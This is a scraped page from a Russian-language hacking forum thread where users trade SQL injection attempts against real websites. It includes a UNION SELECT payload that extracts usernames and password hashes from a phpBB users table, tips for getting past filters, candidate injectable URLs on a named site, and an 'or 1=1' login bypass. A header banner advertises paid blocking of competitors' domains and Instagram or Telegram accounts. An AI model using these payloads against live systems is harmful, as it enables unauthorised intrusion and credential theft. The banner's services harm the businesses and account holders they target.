УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1684 из 2438

1684

Опции темы

Поиск в этой теме

Опции просмотра

#16831

25.04.2011, 18:09

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
2268

Репутация: 0

Да что вы. Здесь нет SQL. Параметр обрабатывается функцией intval. Т е первые цифры сохраняються, а всё что идёт после них обрезаеться.

Пример:

Код:

Code:
http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2'''')))) Пиши всё что угодно!

#16832

25.04.2011, 18:11

guezd

Guest

Сообщений: n/a

Провел на форуме:
59658

Репутация: 81

phpbb 3.0.0 MySQL 4.0.27 blind inj

Код:

Code:
ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-

Результат показывает.

Код:

Code:
?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-

Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти?

#16833

25.04.2011, 18:27

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
2268

Репутация: 0

Цитата:

Сообщение от guezd

guezd said:
phpbb 3.0.0 MySQL 4.0.27 blind inj

Код:

Code:
ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-

Результат показывает.

Код:

Code:
?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-

Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти?

1. В один из- параметров подставь cout(*) и посмотри сколько возможно вывести записей при данном запросе.

2. Конвентируй в HEX, а не в CHAR.

3. Попробуй вывести без WHERE через LIMIT ИЛИ LIKE.

P.S. Не получиться, ссылку в ПМ.

#16834

25.04.2011, 20:15

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от guezd

guezd said:
phpbb 3.0.0 MySQL 4.0.27 blind inj

blind с выводом через union? как это?

#16835

25.04.2011, 20:37

guezd

Guest

Сообщений: n/a

Провел на форуме:
59658

Репутация: 81

Цитата:

Сообщение от M_script

M_script said:
blind с выводом через union? как это?

это ошибка новичка =)

#16836

25.04.2011, 22:28

Crouch

Guest

Сообщений: n/a

Провел на форуме:
735

Репутация: 0

Цитата:

Сообщение от vasykas

vasykas said:
Здесь есть blind
http://cls.tgl.ru/index.php?no_html=1&option=com_rss&feed=RSS2.0
http://cls.tgl.ru/index.php?Itemid=106&option=com_content&task=blogs ection&id=3
http://cls.tgl.ru/index.php?option=com_rss&feed=RSS0.91&no_html=1

Это что-то дает? Значит прокатят blind SQL Injection? Я правильно понял? Как можно это использовать?

#16837

26.04.2011, 13:36

vasykas

Guest

Сообщений: n/a

Провел на форуме:
173402

Репутация: 37

Цитата:

Сообщение от Crouch

Crouch said:
Это что-то дает? Значит прокатят blind SQL Injection? Я правильно понял? Как можно это использовать?

Нет моя прога ошиблась (см. топик выше от XAMEHA)

#16838

26.04.2011, 13:37

vasykas

Guest

Сообщений: n/a

Провел на форуме:
173402

Репутация: 37

сам нашел

#16839

26.04.2011, 13:57

Crouch

Guest

Сообщений: n/a

Провел на форуме:
735

Репутация: 0

Цитата:

Сообщение от vasykas

vasykas said:
Нет моя прога ошиблась (см. топик выше от
XAMEHA
)

Значит все дело в обработке intval?

#16840

26.04.2011, 18:30

Fild3y

Guest

Сообщений: n/a

Провел на форуме:
2522

Репутация: 0

В поле авторизации пишу hi' or 1=1-- на сайте http://*******.tv/login.php И выводит You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hi' or 1=1--' LIMIT 1)' at line 4. Тоесть скуля Как такую крутить?)

Страница 1684 из 2438

1684

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход